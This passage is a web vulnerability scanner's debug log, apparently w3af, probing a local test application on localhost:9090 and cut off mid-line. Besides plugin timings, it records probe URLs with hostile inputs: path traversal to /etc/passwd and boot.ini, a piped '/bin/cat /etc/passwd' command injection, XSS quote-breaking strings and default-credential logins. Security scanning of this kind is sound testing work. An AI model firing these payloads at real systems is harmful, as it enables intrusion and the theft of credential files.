run [Wed Feb 12 10:04:36 2020 - debug] lang.grep(uri="http://localhost:9090/t/") took 0.00s to run [Wed Feb 12 10:04:36 2020 - debug] hash_analysis.grep(uri="http://localhost:9090/t/") took 0.00s to run [Wed Feb 12 10:04:36 2020 - debug] HEAD http://localhost:9090/cgi-bin/cutecast/members/ returned HTTP code "404" (id=24799,from_cache=0,grep=1,rtt=0.05,did=l5vEEDGS) [Wed Feb 12 10:04:36 2020 - debug] GET http://localhost:9090/userreg.cgi?cmd=insert&=&=&=&lang=eng&tnum=3&fld1=test999\ncat<=&/var/spool/mail/login=>=>=&/etc/passwd= returned HTTP code "404" (id=24800,from_cache=0,grep=1,rtt=0.26,did=ODnjU2DD) [Wed Feb 12 10:04:36 2020 - debug] HEAD http://localhost:9090/cgi-bin/.htaccess~ returned HTTP code "404" (id=24801,from_cache=0,grep=1,rtt=0.23,did=f2AdN0Md) [Wed Feb 12 10:04:36 2020 - debug] HEAD http://localhost:9090/.proclog returned HTTP code "404" (id=24803,from_cache=0,grep=1,rtt=0.01,did=nMxi4bc0) [Wed Feb 12 10:04:36 2020 - debug] CachedQueue.put() will write a 'ExceptionData' item to the GrepOut DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepOut DiskDict size is 2476. [Wed Feb 12 10:04:36 2020 - debug] error_pages.grep(uri="http://localhost:9090/t/") took 0.03s to run [Wed Feb 12 10:04:36 2020 - debug] strange_reason.grep(uri="http://localhost:9090/t/") took 0.00s to run [Wed Feb 12 10:04:36 2020 - debug] content_sniffing.grep(uri="http://localhost:9090/t/") took 0.00s to run [Wed Feb 12 10:04:36 2020 - debug] user_defined_regex.grep(uri="http://localhost:9090/t/") took 0.00s to run [Wed Feb 12 10:04:36 2020 - debug] cache_control.grep(uri="http://localhost:9090/t/") took 0.00s to run [Wed Feb 12 10:04:36 2020 - debug] strange_headers.grep(uri="http://localhost:9090/t/") took 0.00s to run [Wed Feb 12 10:04:36 2020 - debug] ssn.grep(uri="http://localhost:9090/t/") took 0.00s to run [Wed Feb 12 10:04:36 2020 - debug] oracle.grep(uri="http://localhost:9090/t/") took 0.00s to run [Wed Feb 12 10:04:36 2020 - debug] feeds.grep(uri="http://localhost:9090/t/") took 0.00s to run [Wed Feb 12 10:04:36 2020 - debug] CachedQueue.put() will write a 'int' item to the GrepIn DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepIn DiskDict size is 4525. [Wed Feb 12 10:04:36 2020 - debug] analyze_cookies.grep(uri="http://localhost:9090/t/") took 0.02s to run [Wed Feb 12 10:04:36 2020 - debug] CachedQueue.put() will write a 'ExceptionData' item to the GrepOut DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepOut DiskDict size is 2477. [Wed Feb 12 10:04:36 2020 - debug] CachedQueue.put() will write a 'int' item to the GrepIn DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepIn DiskDict size is 4526. [Wed Feb 12 10:04:36 2020 - debug] CachedQueue.put() will write a 'ExceptionData' item to the GrepOut DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepOut DiskDict size is 2478. [Wed Feb 12 10:04:36 2020 - debug] GET http://localhost:9090/etc/passwd returned HTTP code "404" (id=24802,from_cache=0,grep=1,rtt=0.05,did=anbqs5gE) [Wed Feb 12 10:04:36 2020 - debug] GET http://localhost:9090/search/ returned HTTP code "404" (id=24805,from_cache=0,grep=1,rtt=0.19,did=pYqGMm40) [Wed Feb 12 10:04:36 2020 - debug] HEAD http://localhost:9090/nphp/nphpd.php returned HTTP code "404" (id=24807,from_cache=0,grep=1,rtt=0.16,did=nyGTXTsx) [Wed Feb 12 10:04:36 2020 - debug] GET http://localhost:9090/styles/ returned HTTP code "404" (id=24808,from_cache=0,grep=1,rtt=0.04,did=Ow0YxZFV) [Wed Feb 12 10:04:36 2020 - debug] HEAD http://localhost:9090/index.html.tw.Big5 returned HTTP code "404" (id=24810,from_cache=0,grep=1,rtt=0.02,did=Ht5IcXx4) [Wed Feb 12 10:04:36 2020 - debug] Grep consumer should_grep() stats: {'reject-seen-body': 13149, 'reject-seen-url': 5842, 'reject-out-of-scope': 216, 'accept': 4968} [Wed Feb 12 10:04:36 2020 - debug] HEAD http://localhost:9090/cgi-bin/bulk/bulk.cgi returned HTTP code "404" (id=24812,from_cache=0,grep=1,rtt=0.10,did=bAk8JwVV) [Wed Feb 12 10:04:36 2020 - debug] HEAD http://localhost:9090/cgi-bin/anyboard.cgi returned HTTP code "404" (id=24813,from_cache=0,grep=1,rtt=0.07,did=A6vlnz06) [Wed Feb 12 10:04:36 2020 - debug] GET http://localhost:9090/cgi-bin/GW5/GWWEB.EXE?GET-CONTEXT=&HTMLVER=AAA returned HTTP code "404" (id=24811,from_cache=0,grep=1,rtt=0.13,did=6XPeqcGK) [Wed Feb 12 10:04:36 2020 - debug] GET http://localhost:9090/learn/vulnerability/a1_injection returned HTTP code "200" (id=24809,from_cache=0,grep=0,rtt=0.19,did=X1OtrmPP) [Wed Feb 12 10:04:36 2020 - debug] [auth.detailed] User "admin" is currently logged into the application (did: X1OtrmPP) [Wed Feb 12 10:04:36 2020 - debug] detailed._login() took 0.78s to run [Wed Feb 12 10:04:36 2020 - debug] GET http://localhost:9090/ns-icons/ returned HTTP code "404" (id=24815,from_cache=0,grep=1,rtt=0.04,did=Kl7Laotb) [Wed Feb 12 10:04:36 2020 - debug] HEAD http://localhost:9090/conspass.chl returned HTTP code "404" (id=24804,from_cache=0,grep=1,rtt=0.16,did=7Nnd5gZL) [Wed Feb 12 10:04:36 2020 - debug] HEAD http://localhost:9090/cgi-bin/admin.pl returned HTTP code "404" (id=24806,from_cache=0,grep=1,rtt=0.05,did=onNr3w39) [Wed Feb 12 10:04:36 2020 - debug] HEAD http://localhost:9090/php/mlog.html returned HTTP code "404" (id=24814,from_cache=0,grep=1,rtt=0.23,did=Br4ID29c) [Wed Feb 12 10:04:36 2020 - debug] HEAD http://localhost:9090/cgi-bin/ncommerce3/ExecMacro/macro.d2w/NOEXISTINGHTMLBLOCK returned HTTP code "404" (id=24818,from_cache=0,grep=1,rtt=0.16,did=SSmRwB3h) [Wed Feb 12 10:04:36 2020 - debug] GET http://localhost:9090/modif_infos.asp?n=/.\\"./.\\"./.\\"./.\\"./.\\"./boot.ini returned HTTP code "404" (id=24820,from_cache=0,grep=1,rtt=0.23,did=7pe9yCmt) [Wed Feb 12 10:04:36 2020 - debug] GET http://localhost:9090/content/base/build/explorer/none.php?..:..:..:..:..:..:..:etc:passwd:= returned HTTP code "404" (id=24822,from_cache=0,grep=1,rtt=0.12,did=eZ2Mq1Vi) [Wed Feb 12 10:04:36 2020 - debug] GET http://localhost:9090/nul.cfm returned HTTP code "404" (id=24824,from_cache=0,grep=1,rtt=0.23,did=bfVjVyYP) [Wed Feb 12 10:04:36 2020 - debug] GET http://localhost:9090/theme1/selector?button=status,monitor,session&button_url=/system/status/status,/system/status/moniter\\">,/system/status/session returned HTTP code "404" (id=24821,from_cache=0,grep=1,rtt=0.21,did=GjBs4dfq) [Wed Feb 12 10:04:36 2020 - debug] HEAD http://localhost:9090/web_app/WEB-INF/webapp.properties returned HTTP code "404" (id=24816,from_cache=0,grep=1,rtt=0.12,did=jVdhAbXj) [Wed Feb 12 10:04:36 2020 - debug] HEAD http://localhost:9090/cgi-bin/Upload.pl returned HTTP code "404" (id=24823,from_cache=0,grep=1,rtt=0.19,did=ZgobcqvB) [Wed Feb 12 10:04:36 2020 - debug] symfony.grep(uri="http://localhost:9090/php/") took 0.00s to run [Wed Feb 12 10:04:36 2020 - debug] CachedQueue.put() will write a 'ExceptionData' item to the GrepOut DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepOut DiskDict size is 2479. [Wed Feb 12 10:04:36 2020 - debug] file_upload.grep(uri="http://localhost:9090/php/") took 0.00s to run [Wed Feb 12 10:04:36 2020 - debug] HEAD http://localhost:9090/servlet/gwmonitor returned HTTP code "404" (id=24819,from_cache=0,grep=1,rtt=0.15,did=49ottCUU) [Wed Feb 12 10:04:36 2020 - debug] HEAD http://localhost:9090/cgi-bin/if/admin/nph-build.cgi returned HTTP code "404" (id=24817,from_cache=0,grep=1,rtt=0.20,did=BCbVVhSA) [Wed Feb 12 10:04:36 2020 - debug] GET http://localhost:9090/imprimer.asp?no=c:\\boot.ini|44|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_ returned HTTP code "404" (id=24826,from_cache=0,grep=1,rtt=0.04,did=bcdlTjhI) [Wed Feb 12 10:04:36 2020 - debug] cross_domain_js.grep(uri="http://localhost:9090/php/") took 0.00s to run [Wed Feb 12 10:04:36 2020 - debug] wsdl_greper.grep(uri="http://localhost:9090/php/") took 0.00s to run [Wed Feb 12 10:04:36 2020 - debug] HEAD http://localhost:9090/index.html.cz.iso8859-2 returned HTTP code "404" (id=24825,from_cache=0,grep=1,rtt=0.05,did=2xX4aSCz) [Wed Feb 12 10:04:36 2020 - debug] expect_ct.grep(uri="http://localhost:9090/php/") took 0.00s to run [Wed Feb 12 10:04:36 2020 - debug] svn_users.grep(uri="http://localhost:9090/php/") took 0.00s to run [Wed Feb 12 10:04:36 2020 - debug] xss_protection_header.grep(uri="http://localhost:9090/php/") took 0.00s to run [Wed Feb 12 10:04:36 2020 - debug] private_ip.grep(uri="http://localhost:9090/php/") took 0.00s to run [Wed Feb 12 10:04:36 2020 - debug] motw.grep(uri="http://localhost:9090/php/") took 0.00s to run [Wed Feb 12 10:04:36 2020 - debug] retirejs.grep(uri="http://localhost:9090/php/") took 0.00s to run [Wed Feb 12 10:04:36 2020 - debug] code_disclosure.grep(uri="http://localhost:9090/php/") took 0.00s to run [Wed Feb 12 10:04:36 2020 - debug] Unknown post-data. Content-type: "None" and/or post-data "" [Wed Feb 12 10:04:36 2020 - debug] serialized_object.grep(uri="http://localhost:9090/php/") took 0.00s to run [Wed Feb 12 10:04:36 2020 - debug] blank_body.grep(uri="http://localhost:9090/php/") took 0.00s to run [Wed Feb 12 10:04:36 2020 - debug] path_disclosure.grep(uri="http://localhost:9090/php/") took 0.00s to run [Wed Feb 12 10:04:36 2020 - debug] strange_http_codes.grep(uri="http://localhost:9090/php/") took 0.00s to run [Wed Feb 12 10:04:36 2020 - debug] credit_cards.grep(uri="http://localhost:9090/php/") took 0.00s to run [Wed Feb 12 10:04:36 2020 - debug] websockets_links.grep(uri="http://localhost:9090/php/") took 0.00s to run [Wed Feb 12 10:04:36 2020 - debug] csp.grep(uri="http://localhost:9090/php/") took 0.00s to run [Wed Feb 12 10:04:37 2020 - debug] dom_xss.grep(uri="http://localhost:9090/php/") took 0.00s to run [Wed Feb 12 10:04:37 2020 - debug] strict_transport_security.grep(uri="http://localhost:9090/php/") took 0.00s to run [Wed Feb 12 10:04:37 2020 - debug] keys.grep(uri="http://localhost:9090/php/") took 0.00s to run [Wed Feb 12 10:04:37 2020 - debug] HEAD http://localhost:9090/index.html.hr.iso8859-2 returned HTTP code "404" (id=24827,from_cache=0,grep=1,rtt=0.02,did=6z4P7Qkz) [Wed Feb 12 10:04:37 2020 - debug] localhost:9090 connection pool stats (free:327 / in_use:2 / max:50 / total:329) [Wed Feb 12 10:04:37 2020 - debug] Connections with more in use time: (551f83813e5e39b0, 0.07 sec) (a759733c71c40b72, 0.02 sec) [Wed Feb 12 10:04:37 2020 - debug] meta_generator.grep(uri="http://localhost:9090/php/") took 0.08s to run [Wed Feb 12 10:04:37 2020 - debug] clamav.grep(uri="http://localhost:9090/php/") took 0.00s to run [Wed Feb 12 10:04:37 2020 - debug] CachedQueue.put() will write a 'ExceptionData' item to the GrepOut DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepOut DiskDict size is 2480. [Wed Feb 12 10:04:37 2020 - debug] CachedQueue.put() will write a 'int' item to the GrepIn DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepIn DiskDict size is 4527. [Wed Feb 12 10:04:37 2020 - debug] vulners_db.grep(uri="http://localhost:9090/php/") took 0.14s to run [Wed Feb 12 10:04:37 2020 - debug] Connection has been in "free_conns" for more than 120.00 seconds, forcefully closing it [Wed Feb 12 10:04:37 2020 - debug] CachedQueue.put() will write a 'ExceptionData' item to the GrepOut DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepOut DiskDict size is 2481. [Wed Feb 12 10:04:37 2020 - debug] Still have 1 unfinished tasks in CrawlInfraIn join() [Wed Feb 12 10:04:37 2020 - debug] GET http://localhost:9090/_private/register.txt returned HTTP code "404" (id=24831,from_cache=0,grep=1,rtt=0.19,did=o7bX8MZs) [Wed Feb 12 10:04:37 2020 - debug] HEAD http://localhost:9090/index.html.pt returned HTTP code "404" (id=24833,from_cache=0,grep=1,rtt=0.10,did=29LreXTN) [Wed Feb 12 10:04:37 2020 - debug] GET http://localhost:9090/javax/ returned HTTP code "404" (id=24834,from_cache=0,grep=1,rtt=0.19,did=4yAbqhcT) [Wed Feb 12 10:04:37 2020 - debug] HEAD http://localhost:9090/spelling.php3 returned HTTP code "404" (id=24828,from_cache=0,grep=1,rtt=0.07,did=nSCBJ0xh) [Wed Feb 12 10:04:37 2020 - debug] GET http://localhost:9090/ojspdemos/basic/hellouser/hellouser.jsp returned HTTP code "404" (id=24836,from_cache=0,grep=1,rtt=0.03,did=JtDhB1ZF) [Wed Feb 12 10:04:37 2020 - debug] GET http://localhost:9090/xsql/demo/adhocsql/query.xsql?sql=select username from ALL_USERS returned HTTP code "404" (id=24832,from_cache=0,grep=1,rtt=0.06,did=CJd7DfYg) [Wed Feb 12 10:04:37 2020 - debug] GET http://localhost:9090/aktivate/cgi-bin/catgy.cgi?key=0&cartname=axa200135022551089&desc= returned HTTP code "404" (id=24829,from_cache=0,grep=1,rtt=0.03,did=Fm3fV8Ke) [Wed Feb 12 10:04:37 2020 - debug] HEAD http://localhost:9090/cgi-bin/quizme.cgi returned HTTP code "404" (id=24830,from_cache=0,grep=1,rtt=0.08,did=KvYKlLev) [Wed Feb 12 10:04:37 2020 - debug] Grep consumer should_grep() stats: {'reject-seen-body': 13169, 'reject-seen-url': 5843, 'reject-out-of-scope': 216, 'accept': 4972} [Wed Feb 12 10:04:37 2020 - debug] GET http://localhost:9090/.bash_history returned HTTP code "404" (id=24835,from_cache=0,grep=1,rtt=0.03,did=ubvj2lip) [Wed Feb 12 10:04:37 2020 - debug] GET http://localhost:9090/tmp_view.php?file=/etc/passwd returned HTTP code "404" (id=24837,from_cache=0,grep=1,rtt=0.15,did=GMtwvT0e) [Wed Feb 12 10:04:37 2020 - debug] HEAD http://localhost:9090/cgi-bin/counterbanner returned HTTP code "404" (id=24838,from_cache=0,grep=1,rtt=0.10,did=YbFrKx2r) [Wed Feb 12 10:04:37 2020 - debug] HEAD http://localhost:9090/_vti_bin/fpremadm.exe returned HTTP code "404" (id=24840,from_cache=0,grep=1,rtt=0.13,did=bupvj8xa) [Wed Feb 12 10:04:37 2020 - debug] url_session.grep(uri="http://localhost:9090/php/") took 0.05s to run [Wed Feb 12 10:04:37 2020 - debug] dot_net_event_validation.grep(uri="http://localhost:9090/php/") took 0.00s to run [Wed Feb 12 10:04:37 2020 - debug] objects.grep(uri="http://localhost:9090/php/") took 0.00s to run [Wed Feb 12 10:04:37 2020 - debug] error_500.grep(uri="http://localhost:9090/php/") took 0.00s to run [Wed Feb 12 10:04:37 2020 - debug] meta_tags.grep(uri="http://localhost:9090/php/") took 0.00s to run [Wed Feb 12 10:04:37 2020 - debug] password_profiling.grep(uri="http://localhost:9090/php/") took 0.00s to run [Wed Feb 12 10:04:37 2020 - debug] click_jacking.grep(uri="http://localhost:9090/php/") took 0.00s to run [Wed Feb 12 10:04:37 2020 - debug] directory_indexing.grep(uri="http://localhost:9090/php/") took 0.00s to run [Wed Feb 12 10:04:37 2020 - debug] lang.grep(uri="http://localhost:9090/php/") took 0.00s to run [Wed Feb 12 10:04:37 2020 - debug] CachedQueue.put() will write a 'ExceptionData' item to the GrepOut DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepOut DiskDict size is 2482. [Wed Feb 12 10:04:37 2020 - debug] CachedQueue.get() from GrepIn DiskDict was used to read an item from disk. The current GrepIn DiskDict size is 4527. [Wed Feb 12 10:04:37 2020 - debug] HEAD http://localhost:9090/cgi-bin/mailform.exe returned HTTP code "404" (id=24841,from_cache=0,grep=1,rtt=0.08,did=jyTkvURh) [Wed Feb 12 10:04:37 2020 - debug] HEAD http://localhost:9090/OpenTopic returned HTTP code "404" (id=24845,from_cache=0,grep=1,rtt=0.10,did=ras8TdJ3) [Wed Feb 12 10:04:37 2020 - debug] HEAD http://localhost:9090/scripts/contents.htm returned HTTP code "404" (id=24844,from_cache=0,grep=1,rtt=0.21,did=tClupH4o) [Wed Feb 12 10:04:37 2020 - debug] GET http://localhost:9090/test/jsp/pageIsThreadSafe.jsp returned HTTP code "404" (id=24843,from_cache=0,grep=1,rtt=0.17,did=2jZ6g6Ih) [Wed Feb 12 10:04:37 2020 - debug] GET http://localhost:9090/bottom.html returned HTTP code "404" (id=24839,from_cache=0,grep=1,rtt=0.05,did=euu4j6aE) [Wed Feb 12 10:04:37 2020 - debug] HEAD http://localhost:9090/cgi-bin/replicator/webpage.cgi/ returned HTTP code "404" (id=24842,from_cache=0,grep=1,rtt=0.21,did=f74Tcias) [Wed Feb 12 10:04:37 2020 - debug] localhost:9090 connection pool stats (free:323 / in_use:11 / max:50 / total:334) [Wed Feb 12 10:04:37 2020 - debug] Connections with more in use time: (aa6c145c821ae647, 0.19 sec) (1d1975da15d3ba97, 0.09 sec) (285673e62884f0d5, 0.08 sec) (8871671459c9433f, 0.05 sec) (768418029b34e139, 0.03 sec) [Wed Feb 12 10:04:37 2020 - debug] GET http://localhost:9090/lcgi/sys:/novonyx/suitespot/docs/sewse/misc/test.jse returned HTTP code "404" (id=24846,from_cache=0,grep=1,rtt=0.21,did=4qhWDpGp) [Wed Feb 12 10:04:37 2020 - debug] CachedQueue.put() will write a 'int' item to the GrepIn DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepIn DiskDict size is 4527. [Wed Feb 12 10:04:37 2020 - debug] hash_analysis.grep(uri="http://localhost:9090/php/") took 0.00s to run [Wed Feb 12 10:04:37 2020 - debug] GET http://localhost:9090/manual/servlets/scripts/shoes/shoeform.htm returned HTTP code "404" (id=24849,from_cache=0,grep=1,rtt=0.15,did=w2SxG9uA) [Wed Feb 12 10:04:37 2020 - debug] HEAD http://localhost:9090/cgi-bin/non-existent.pl returned HTTP code "404" (id=24850,from_cache=0,grep=1,rtt=0.07,did=2irRZDmQ) [Wed Feb 12 10:04:37 2020 - debug] HEAD http://localhost:9090/.procmailrc returned HTTP code "404" (id=24848,from_cache=0,grep=1,rtt=0.05,did=qwKxV0Y5) [Wed Feb 12 10:04:37 2020 - debug] CachedQueue.put() will write a 'int' item to the GrepIn DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepIn DiskDict size is 4528. [Wed Feb 12 10:04:37 2020 - debug] CachedQueue.put() will write a 'ExceptionData' item to the GrepOut DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepOut DiskDict size is 2483. [Wed Feb 12 10:04:37 2020 - debug] error_pages.grep(uri="http://localhost:9090/php/") took 0.08s to run [Wed Feb 12 10:04:37 2020 - debug] strange_reason.grep(uri="http://localhost:9090/php/") took 0.00s to run [Wed Feb 12 10:04:37 2020 - debug] content_sniffing.grep(uri="http://localhost:9090/php/") took 0.00s to run [Wed Feb 12 10:04:37 2020 - debug] user_defined_regex.grep(uri="http://localhost:9090/php/") took 0.00s to run [Wed Feb 12 10:04:37 2020 - debug] cache_control.grep(uri="http://localhost:9090/php/") took 0.00s to run [Wed Feb 12 10:04:37 2020 - debug] strange_headers.grep(uri="http://localhost:9090/php/") took 0.00s to run [Wed Feb 12 10:04:37 2020 - debug] ssn.grep(uri="http://localhost:9090/php/") took 0.00s to run [Wed Feb 12 10:04:37 2020 - debug] oracle.grep(uri="http://localhost:9090/php/") took 0.00s to run [Wed Feb 12 10:04:37 2020 - debug] feeds.grep(uri="http://localhost:9090/php/") took 0.00s to run [Wed Feb 12 10:04:37 2020 - debug] HEAD http://localhost:9090/cgi-bin/.htpasswd returned HTTP code "404" (id=24851,from_cache=0,grep=1,rtt=0.23,did=MtGWWzjo) [Wed Feb 12 10:04:37 2020 - debug] GET http://localhost:9090/servlet/Counter returned HTTP code "404" (id=24853,from_cache=0,grep=1,rtt=0.24,did=nLb7c1q0) [Wed Feb 12 10:04:37 2020 - debug] HEAD http://localhost:9090/cgi-bin/ikonboard/help.cgi returned HTTP code "404" (id=24854,from_cache=0,grep=1,rtt=0.09,did=GnjJzWOn) [Wed Feb 12 10:04:37 2020 - debug] GET http://localhost:9090/nul.dbm returned HTTP code "404" (id=24855,from_cache=0,grep=1,rtt=0.09,did=a2DNMV9D) [Wed Feb 12 10:04:37 2020 - debug] GET http://localhost:9090/GW5/GWWEB.EXE?HELP=bad-request returned HTTP code "404" (id=24856,from_cache=0,grep=1,rtt=0.07,did=vXiA4Kua) [Wed Feb 12 10:04:37 2020 - debug] HEAD http://localhost:9090/site/eg/source.asp returned HTTP code "404" (id=24858,from_cache=0,grep=1,rtt=0.08,did=5bKXFVKZ) [Wed Feb 12 10:04:37 2020 - debug] HEAD http://localhost:9090/metacart/database/metacart.mdb returned HTTP code "404" (id=24860,from_cache=0,grep=1,rtt=0.07,did=0YWuYrof) [Wed Feb 12 10:04:37 2020 - debug] HEAD http://localhost:9090/index.html.de returned HTTP code "404" (id=24847,from_cache=0,grep=1,rtt=0.08,did=aSZqo59k) [Wed Feb 12 10:04:37 2020 - debug] CachedQueue.put() will write a 'ExceptionData' item to the GrepOut DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepOut DiskDict size is 2484. [Wed Feb 12 10:04:37 2020 - debug] HEAD http://localhost:9090/index.html.var returned HTTP code "404" (id=24859,from_cache=0,grep=1,rtt=0.09,did=NGjcRTuX) [Wed Feb 12 10:04:37 2020 - debug] CachedQueue.put() will write a 'int' item to the GrepIn DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepIn DiskDict size is 4529. [Wed Feb 12 10:04:37 2020 - debug] GET http://localhost:9090/examples/jsp/index.html returned HTTP code "404" (id=24852,from_cache=0,grep=1,rtt=0.13,did=YP45yzk5) [Wed Feb 12 10:04:37 2020 - debug] analyze_cookies.grep(uri="http://localhost:9090/php/") took 0.12s to run [Wed Feb 12 10:04:37 2020 - debug] HEAD http://localhost:9090/cgi-bin/utm/admin returned HTTP code "404" (id=24857,from_cache=0,grep=1,rtt=0.07,did=Swuzeg0Z) [Wed Feb 12 10:04:37 2020 - debug] HEAD http://localhost:9090/php/mlog.phtml returned HTTP code "404" (id=24862,from_cache=0,grep=1,rtt=0.05,did=gvSSfFzv) [Wed Feb 12 10:04:37 2020 - debug] HEAD http://localhost:9090/_vti_bin/shtml.exe/_vti_rpc returned HTTP code "404" (id=24864,from_cache=0,grep=1,rtt=0.05,did=NbCyf3mX) [Wed Feb 12 10:04:37 2020 - debug] HEAD http://localhost:9090/data/member_log.txt returned HTTP code "404" (id=24865,from_cache=0,grep=1,rtt=0.09,did=04a9WNI1) [Wed Feb 12 10:04:37 2020 - debug] GET http://localhost:9090/proxy/ssllogin?user=administrator&password=operator returned HTTP code "404" (id=24866,from_cache=0,grep=1,rtt=0.17,did=cxdRImX7) [Wed Feb 12 10:04:37 2020 - debug] HEAD http://localhost:9090/project/index.php?m=projects&user_cookie=1 returned HTTP code "404" (id=24867,from_cache=0,grep=1,rtt=0.19,did=8wqTPUkQ) [Wed Feb 12 10:04:37 2020 - debug] CachedQueue.put() will write a 'int' item to the GrepIn DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepIn DiskDict size is 4530. [Wed Feb 12 10:04:37 2020 - debug] CachedQueue.put() will write a 'ExceptionData' item to the GrepOut DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepOut DiskDict size is 2485. [Wed Feb 12 10:04:37 2020 - debug] HEAD http://localhost:9090/cgi-bin/day5datanotifier.cgi returned HTTP code "404" (id=24863,from_cache=0,grep=1,rtt=0.12,did=QQNJSGZe) [Wed Feb 12 10:04:37 2020 - debug] symfony.grep(uri="http://localhost:9090/89/") took 0.00s to run [Wed Feb 12 10:04:37 2020 - debug] wsdl_greper.grep(uri="http://localhost:9090/89/") took 0.00s to run [Wed Feb 12 10:04:37 2020 - debug] GET http://localhost:9090/forum/memberlist.php?s=23c37cf1af5d2ad05f49361b0407ad9e&what=\\">\\" returned HTTP code "404" (id=24861,from_cache=0,grep=1,rtt=0.11,did=dh7anjvH) [Wed Feb 12 10:04:37 2020 - debug] file_upload.grep(uri="http://localhost:9090/89/") took 0.00s to run [Wed Feb 12 10:04:37 2020 - debug] expect_ct.grep(uri="http://localhost:9090/89/") took 0.00s to run [Wed Feb 12 10:04:37 2020 - debug] svn_users.grep(uri="http://localhost:9090/89/") took 0.00s to run [Wed Feb 12 10:04:37 2020 - debug] xss_protection_header.grep(uri="http://localhost:9090/89/") took 0.00s to run [Wed Feb 12 10:04:37 2020 - debug] private_ip.grep(uri="http://localhost:9090/89/") took 0.00s to run [Wed Feb 12 10:04:37 2020 - debug] motw.grep(uri="http://localhost:9090/89/") took 0.00s to run [Wed Feb 12 10:04:37 2020 - debug] cross_domain_js.grep(uri="http://localhost:9090/89/") took 0.00s to run [Wed Feb 12 10:04:37 2020 - debug] retirejs.grep(uri="http://localhost:9090/89/") took 0.00s to run [Wed Feb 12 10:04:37 2020 - debug] code_disclosure.grep(uri="http://localhost:9090/89/") took 0.00s to run [Wed Feb 12 10:04:37 2020 - debug] CachedQueue.put() will write a 'int' item to the GrepIn DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepIn DiskDict size is 4531. [Wed Feb 12 10:04:37 2020 - debug] localhost:9090 connection pool stats (free:327 / in_use:7 / max:50 / total:334) [Wed Feb 12 10:04:37 2020 - debug] Connections with more in use time: (bd1ee75c6af50c06, 0.15 sec) (285673e62884f0d5, 0.14 sec) (795977d58e324984, 0.12 sec) (f5db311abe562806, 0.10 sec) (3c7d92439ccfd9c7, 0.05 sec) [Wed Feb 12 10:04:37 2020 - debug] GET http://localhost:9090/test/jsp/extends1.jsp returned HTTP code "404" (id=24869,from_cache=0,grep=1,rtt=0.18,did=i8iOPUpR) [Wed Feb 12 10:04:37 2020 - debug] HEAD http://localhost:9090/consport.chl returned HTTP code "404" (id=24868,from_cache=0,grep=1,rtt=0.03,did=7rKLGoC3) [Wed Feb 12 10:04:37 2020 - debug] GET http://localhost:9090/cgi-bin/guestbook.cgi?user=cpanel&template=|/bin/cat /etc/passwd| returned HTTP code "404" (id=24871,from_cache=0,grep=1,rtt=0.26,did=9dYELW4P) [Wed Feb 12 10:04:37 2020 - debug] HEAD http://localhost:9090/servlet/PrintServlet returned HTTP code "404" (id=24872,from_cache=0,grep=1,rtt=0.19,did=n5NlHnn9) [Wed Feb 12 10:04:37 2020 - debug] HEAD http://localhost:9090/cgi-bin/cfgwiz.exe returned HTTP code "404" (id=24873,from_cache=0,grep=1,rtt=0.05,did=Tg5iIcdW) [Wed Feb 12 10:04:37 2020 - debug] CachedQueue.put() will write a 'ExceptionData' item to the GrepOut DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepOut DiskDict size is 2486. [Wed Feb 12 10:04:37 2020 - debug] meta_generator.grep(uri="http://localhost:9090/89/") took 0.00s to run [Wed Feb 12 10:04:37 2020 - debug] Unknown post-data. Content-type: "None" and/or post-data "" [Wed Feb 12 10:04:37 2020 - debug] serialized_object.grep(uri="http://localhost:9090/89/") took 0.00s to run [Wed Feb 12 10:04:37 2020 - debug] blank_body.grep(uri="http://localhost:9090/89/") took 0.00s to run [Wed Feb 12 10:04:37 2020 - debug] path_disclosure.grep(uri="http://localhost:9090/89/") took 0.00s to run [Wed Feb 12 10:04:37 2020 - debug] strange_http_codes.grep(uri="http://localhost:9090/89/") took 0.00s to run [Wed Feb 12 10:04:37 2020 - debug] credit_cards.grep(uri="http://localhost:9090/89/") took 0.00s to run [Wed Feb 12 10:04:37 2020 - debug] websockets_links.grep(uri="http://localhost:9090/89/") took 0.00s to run [Wed Feb 12 10:04:37 2020 - debug] csp.grep(uri="http://localhost:9090/89/") took 0.00s to run [Wed Feb 12 10:04:37 2020 - debug] dom_xss.grep(uri="http://localhost:9090/89/") took 0.00s to run [Wed Feb 12 10:04:37 2020 - debug] strict_transport_security.grep(uri="http://localhost:9090/89/") took 0.00s to run [Wed Feb 12 10:04:37 2020 - debug] keys.grep(uri="http://localhost:9090/89/") took 0.00s to run [Wed Feb 12 10:04:37 2020 - debug] GET http://localhost:9090/cgi-bin/printenv returned HTTP code "404" (id=24874,from_cache=0,grep=1,rtt=0.02,did=NhNX5FeE) [Wed Feb 12 10:04:37 2020 - debug] CachedQueue.put() will write a 'int' item to the GrepIn DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepIn DiskDict size is 4532. [Wed Feb 12 10:04:37 2020 - debug] HEAD http://localhost:9090/index.html.it returned HTTP code "404" (id=24870,from_cache=0,grep=1,rtt=0.23,did=eE5krn0o) [Wed Feb 12 10:04:37 2020 - debug] CachedQueue.put() will write a 'int' item to the GrepIn DiskDict. This uses more CPU and disk IO than storing in memory but will 